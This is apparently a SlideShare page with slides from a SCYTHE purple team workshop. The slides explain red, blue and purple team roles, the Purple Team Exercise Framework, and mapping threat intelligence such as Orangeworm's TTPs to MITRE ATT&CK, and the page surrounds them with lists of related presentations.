Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
 

Similaire à SCYTHE Purple Team Workshop with Tim Schulz

Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020
Jorge Orchilles
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29
Jorge Orchilles
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Jorge Orchilles
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE - ATT&CKcon
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Joe Vest
 
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Harry McLaren
 
Managing Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber SecurityManaging Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber Security
Priyanka Aash
 
Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...
Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...
Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...
Manuel Pais
 

Similaire à SCYTHE Purple Team Workshop with Tim Schulz (20)

Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red Teamers
 
Evolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceEvolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV Conference
 
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
 
KringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityKringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive Security
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
 
earning by s/doing/h4ck1ng/ - Our experience learning application security th...
earning by s/doing/h4ck1ng/ - Our experience learning application security th...earning by s/doing/h4ck1ng/ - Our experience learning application security th...
earning by s/doing/h4ck1ng/ - Our experience learning application security th...
 
Evolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootConEvolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootCon
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
 
The Art and Science of Analyzing Software Data
The Art and Science of Analyzing Software DataThe Art and Science of Analyzing Software Data
The Art and Science of Analyzing Software Data
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
 
Sans community night - purple is the new black
Sans community night - purple is the new blackSans community night - purple is the new black
Sans community night - purple is the new black
 
Red Hat vs. Blue Hat Which Is Better_.pptx
Red Hat vs. Blue Hat Which Is Better_.pptxRed Hat vs. Blue Hat Which Is Better_.pptx
Red Hat vs. Blue Hat Which Is Better_.pptx
 
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
 
Common themes in cyber attacks and what they mean for defenders' presentation...
Common themes in cyber attacks and what they mean for defenders' presentation...Common themes in cyber attacks and what they mean for defenders' presentation...
Common themes in cyber attacks and what they mean for defenders' presentation...
 
Managing Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber SecurityManaging Next Generation Threats to Cyber Security
Managing Next Generation Threats to Cyber Security
 
Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...
Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...
Avoiding the CI/CD Monolith with Team Design & Evolution @ London CD meetup, ...
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
 

Plus de Jorge Orchilles

C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020
Jorge Orchilles
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 Matrix
Jorge Orchilles
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Jorge Orchilles
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control Frameworks
Jorge Orchilles
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 Apps
Jorge Orchilles
 

Plus de Jorge Orchilles (11)

C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 Matrix
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpCon
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestAdversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control Frameworks
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 Apps
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA Presentation
 
Emerging Threats to Infrastructure
Emerging Threats to InfrastructureEmerging Threats to Infrastructure
Emerging Threats to Infrastructure
 
Windows 7 Security
Windows 7 SecurityWindows 7 Security
Windows 7 Security
 

Dernier

Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Dernier (20)

Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 

SCYTHE Purple Team Workshop with Tim Schulz

  • 2. @teschulz Tim Schulz ● Adversary Emulation Lead @ SCYTHE ● Six years @ Sandia National Labs & MITRE ○ Adversary Emulation ○ Red Team ○ Purple Team ○ ICS ● Open Source Intelligence Gathering ● Digital Forensics Training 2
  • 3. @teschulz Hands-On Workshop Format ● Brand new lab environment for you to play CTI, Red Team, and Blue Team ○ Consume CTI, emulate, and then defend against Orangeworm and Ryuk ● Built on VMware Learning Platform ○ Everyone should have received an email with a unique URL ● Lecture to introduce key concepts ● 3 total hours to play in the lab environment - self paced manual ● 4 Systems ○ Unicorn - Windows member server you login to and can compromise ○ SCYTHE - the industry leading adversary emulation attack platform ○ SANS Slingshot C2 Matrix Edition - a bunch of C2s pre-installed and VECTR ○ UnicornDC1 - a domain controller 3
  • 4. @teschulz Takeaways ● Learning about purple teaming! ● Taking it back to work ○ Understanding the value and sharing it with others ● Equipping you with knowledge and tooling ○ Purple Team Exercise Framework ○ #ThreatThursday ○ SCYTHE Enterprise Platform ● Getting CPE credits (yeah, we know, you gotta get them) 4
  • 5. @teschulz What are we learning? ● What is Purple Team? ● Ethical Hacking Evolution ● Framework/Methodology ● Cyber Threat Intelligence ● Preparation ● Purple Team Exercise Flow ● Lessons Learned ● Hands-On Workshop 5
  • 6. @teschulz What is Purple Team? A Purple Team is a virtual team where the following teams work together: ● Cyber Threat Intelligence - team to research and provide threat TTPs ● Red Team - offensive team in charge of emulating adversaries ● Blue Team - the defenders. Security Operations Center (SOC), Hunt Team, Digital Forensics and Incident Response (DFIR), and/or Managed Security Service Provides (MSSP) 6
  • 8. @teschulz Red and Blue just work together... 8
  • 9. @teschulz How we think it will go 9
  • 11. @teschulz Purple Case Study - Scenario ● 6 week Purple Team Exercise - Assumed Breach scenario ● SCYTHE was hired to perform all 3 roles (red, blue, CTI) ● Challenge: $0 spend on new technology ○ Only tuning current security controls 11
  • 12. @teschulz Purple Case Study - Threats Week 1 - Baseline testing: access, C2, understand controls Week 2 - APT19: low sophistication Chinese threat actor Week 3 - Buhtrap: medium sophistication Russian threat actor Week 4 - APT33: medium sophistication Iranian threat actor Week 5 - APT3: high sophistication Chinese threat actor Week 6 - Free Play: red team plan based on previous weeks 12
  • 13. @teschulz Purple Case Study - Baseline 13 ● 94% of Adversary Behavior was undetected ● 3 test cases detected by current controls ● 1 test case blocked Baseline Result Known threats have the ability to achieve their objective without being detected
  • 14. @teschulz Purple Case Study - Results 14 ● $0 technology spend to achieve 64% detection rate ● Enabled telemetry (Sysmon) ● Created logic for alerts on End State Result Known threats will be detected and responded to before achieving objective
  • 15. @teschulz All Offensive Security is about Providing Value
  • 16. @teschulz Ethical Hacking Maturity Model ● Common Vulnerability and Exposures != Tactics, Techniques, and Procedures ● Mature organizations operate under “Assume Breach” ○ Some vulnerability will not be patched before it is exploited ○ Some user will fall for social engineering and execute payload or provide credentials ○ What do we do then? ● Testing technology is not enough: People, Process, and Technology https://www.scythe.io/library/scythes-ethical-hacking-maturity-model 16 Vulnerability Scanning Vulnerability Assessment Penetration Testing Red Team Purple Team Adversary Emulation
  • 17. @teschulz Red Team ● Definition: ○ Emulate Tactics, Techniques, and Procedures (TTPs) to test people, processes, and technology ● Goal: ○ Make Blue Team better ○ Test Assumptions ○ Train and measure whether blue teams' detection and response policies, procedures, and technologies are effective 17 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Effort: ○ Manual ● Frequency: ○ Intelligence-led (new exploit, tool, or TTP) ● Customer: ○ Blue Teams “The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal 1997
  • 18. @teschulz Blue Team ● The defenders in an organization entrusted with identifying and remediating attacks. ○ Generally associated with Security Operations Center or Managed Security Service Provider (MSSP), Hunt Team, Incident Response, and Digital Forensics. ○ Really, it is everyone's responsibility! ● Goal: Identify, contain, and eradicate attacks ● Effort: Manual ● Frequency: 24/7 ● Customer: Entire organization 18 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Log ○ Relevant Events ○ Locally ○ Central Log Aggregator ● Alert ○ Severity ● Respond ○ Process ○ People ○ Automation
  • 19. @teschulz Adversary Emulation ● Definition: ○ A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries ○ May be non-blind a.k.a Purple Team ● Goal: ○ Emulate an adversary attack chain or scenario ● Effort: ○ Manual; SCYTHE is changing that ● Customer: ○ Entire organization 19 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
  • 21. @teschulz Purple Team Exercises 21 ● Virtual, functional team where teams work together to measure and improve defensive security posture ○ CTI provides threat actor with capability, intent, and opportunity to attack ○ Red Team creates adversary emulation plan ○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses ○ Emulation of each adversary behavior (TTP) ○ Blue Team look for indicators of behavior ○ Red and Blue work together to create remediation action plan ● Repeat exercises to measure and improve people, process, and technology
  • 22. @teschulz When to Purple Team? ● Train the organization’s defenders (Blue Team) ● Test the processes between security teams ● Test attack chains/TTPs that have not been tested before ● Preparation/Replay of a Red Team Engagement ● Foster a collaborative culture within the security organization 22
  • 23. @teschulz Framework & Methodology 23 ● Cyber Kill Chain – Lockheed Martin ● Unified Cyber Kill Chain – Paul Pols ● Financial/Regulatory Frameworks ○ CBEST Intelligence Led Testing ○ Threat Intelligence-Based Ethical Red Teaming ○ Red Team: Adversarial Attack Simulation Exercises ○ Intelligence-led Cyber Attack Simulation Testing ○ A Framework for the Regulatory Use of Penetration Testing in the Financial Services Industry ● Purple Team Exercise Framework (PTEF) ● Testing Framework:
  • 27. @teschulz Purple Team Exercise Framework Download the Framework now so you can follow along: https://scythe.io/ptef 27
  • 28. @teschulz Roles and Responsibilities Title Role Responsibility Head of Security Sponsor Approve Purple Team Exercise and Budget Cyber Threat Intelligence Sponsor Cyber Threat Intelligence Red Team & Blue Team Managers Sponsor Preparation: Define Goals, Select Attendees Red Team Attendee Preparation, Exercise Execution Blue Team - SOC, Hunt Team, DFIR Attendee Preparation, Exercise Execution Project Manager Exercise Coordinator Lead point of contact throughout the entire Purple Team Exercise. Responsible to ensure Cyber Threat Intelligence is provided. Ensures all Preparation steps are taken prior to Exercise Execution. During Exercise Execution, record minutes, notes, action items, and feedback. Send daily emails with those notes as well as guidance for what’s planned for the next day. Compile and deliver Lessons Learned. 28
  • 29. @teschulz Sponsors (convince them about Purple Team) ● Approve ○ Purple Team Exercise ○ Goals and Scope ○ Budget $$$ ● Members of various teams out of BAU ○ Cyber Threat Intelligence ○ Red Team ○ Security Operations Center ○ Hunt Team ○ Digital Forensics ○ Incident Response 29
  • 30. @teschulz Time Requirements ● Purple Team Exercises can run for 2 hours to multiple weeks of mostly hands on keyboard work between Red Team and Blue Teams ● Preparation time is based on the defined goals, guidance or constraints set by Sponsors, and emulated adversary’s TTPs 30 Preparation Exercise Lessons Learned Days-Weeks Hours-Days-Weeks TBD
  • 31. @teschulz Cyber Threat Intelligence 31 ATT&CKing the Status Quo: Threat-Based Adversary Emulation with MITRE ATT&CK - Katie Nickels and Cody Thomas
  • 32. @teschulz Types of Cyber Threat Intelligence 32 David Bianco: http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
  • 33. @teschulz Extract TTPs 33 S0129 – AutoIT T1068 – Exploitation for Privilege Escalation S0194 - PowerSploit T1003 - Credential Dumping IP Address S0002 - Mimikatz S0192 - Pupy Hash Value T1086 - Powershell
  • 35. @teschulz Analyze & Organize 35 Tactic Description Description Description of adversary Objective Adversary objectives and goals Command and Control Technique ID - Technique Name - Details Initial Access Technique ID - Technique Name - Details Execution Technique ID - Technique Name - Details Defense Evasion Technique ID - Technique Name - Details Discovery Technique ID - Technique Name - Details Privilege Escalation Technique ID - Technique Name - Details Persistence Technique ID - Technique Name - Details Credential Access Technique ID - Technique Name - Details Exfiltration Technique ID - Technique Name - Details
  • 36. @teschulz #ThreatThursday ● Introduce Adversary ● Consume CTI and map to MITRE ATT&CK ● Present Adversary Emulation Plan ● Share the plan on SCYTHE Community Threat Github ○ https://github.com/scythe-io/community-threats/ ● Emulate Adversary ● How to defend against adversary ● All available to the community for free: https://www.scythe.io/threatthursday 36
  • 37. @teschulz Orangeworm 37 Tactic Description Description Orangeworm is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015 for corporate espionage. C2 T1071 - Application Layer Protocol; T1071.001 - Web Protocols; T1008 - Fallback Channel Execution T1218 - Signed Binary Proxy Execution; T1218.011 - Rundll32; T1059 - Command and Scripting Interpreter; T1059.003 - Windows Command Shell; T1569 - System Services; T1569.002 - Service Execution Defense Evasion T1036 - Masquerading; T1036.004 - Masquerade Task or Service; T1027 - Obfuscated Files or Information; T1027.001 - Binary Padding; T1070 - Indicator Removal on Host; T1070.004 - File Deletion; T1070.005 - Network Share Connection Removal; T1140 - Deobfuscate/Decode Files or Information Discovery T1087 - Account Discovery; T1087.001 - Local Account; T1087.002 - Domain Account; T1201 - Password Policy Discovery; T1069 - Permission Groups Discovery; T1069.002 - Domain Groups; T1069.001 - Local Groups; T1057 - Process Discovery; T1018 - Remote System Discovery; T1082 - System Information Discovery; T1016 - System Network Configuration Discovery T1049 - System Network Connections Discovery; T1033 - System Owner/User Discovery; T1007 - System Service Discovery T1083 - File and Directory Discovery;T1124 - System Time Discovery; T1135 - Network Share Discovery Persistence T1136.001 - Local Account; T1136.002 - Domain Account; T1543.003 - Windows Service Lateral Movement T1021 - Remote Services; T1021.002 - SMB/Windows Admin Shares; T1105 - Ingress Tool Transfer; T1570 - Lateral Tool Transfer https://www.scythe.io/library/threatthursday-orangeworm
  • 38. @teschulz Logistics 38 ● Pick a location ● Virtual or Remote? ○ Virtual: Choose a Platform (Zoom, GoToMeeting, etc) ○ For physical locations: SOC locations are ideal as SOC Analysts, Hunt Team, and Incident Response are generally physically present ■ Obtain travel approval from sponsors ■ Plan to arrive a day early ■ Training room or large conference room ● Each attendee should have workstation with media output or screen sharing to show current screen to other participants
  • 39. @teschulz Target Systems Provision production systems for exercise that represent the organization ● Endpoint Operation Systems ○ Standard endpoints - 2 of each (Windows 10, Linux, macOS) ○ Physical systems ○ Virtual Desktop Infrastructure ○ Terminal Services/Citrix ● Server Operating Systems in Environment ○ Windows Servers ○ *nix Servers ○ Include Virtual and Cloud Servers ● 39
  • 40. @teschulz Security Tools Request the target systems have production security tools: ● Anti-Virus/Anti-Malware/Anti-Exploit ● Endpoint Detection & Response (EDR) ● Forensic Tools ● Image acquisition ● Live forensics ● Ensure flow of traffic goes through standard, production network-based devices such as firewalls and proxy logs 40
  • 41. @teschulz SOC/Hunt Team Preparation ● Validate security tools are reporting to production security tools from the target systems ● Ensure attack infrastructure is accessible through proxy/outbound controls ● Ensure attack infrastructure is being decrypted (TLS decryption/interception) ● Verify allowlists and notify Red Team ● Work with Red Team as payloads and C2 are tested prior to exercise on non-exercise systems ● Threat Hunting Playbooks - https://threathunterplaybook.com/introduction.html 41
  • 42. @teschulz DFIR Preparation ● Create an exercise case as per the DFIR process ○ This will allow tagging artifacts and following normal processes without flagging any suspicious activity (e.g. pulling memory from a system that does not have a formal case) ○ Ensure the target systems are not segmented or wiped as they will be used throughout the exercise. It is worth noting that DFIR results serve as a great resource for Cyber Threat Intelligence. ● Ensure the correct forensic tools are deployed on the target systems ● Install Live Forensic Tools for efficiency during Purple Team Exercise. For example: ○ Sysmon ○ Processmon 42
  • 43. @teschulz Kick Off the Exercise ● Sponsor kicks off the exercise ● Motivate the attendees ● Go over the flow of the exercise 43
  • 44. @teschulz Exercise Flow 1. Cyber Threat Intelligence, Exercise Coordinator, and/or Red Team presents the adversary, TTPs, and technical details: ○ Adversary behavior ○ Procedure ○ Tool used ○ Attack Vector ○ Delivery Method ○ Privilege gained 2. Purple Team discussion of expected controls based on TTP ○ SOC: Any logs or alerts for this TTP ○ Hunt Team: Any Hunt Cases for this TTP ○ DFIR: Documented methods to identify if TTP was leveraged 44
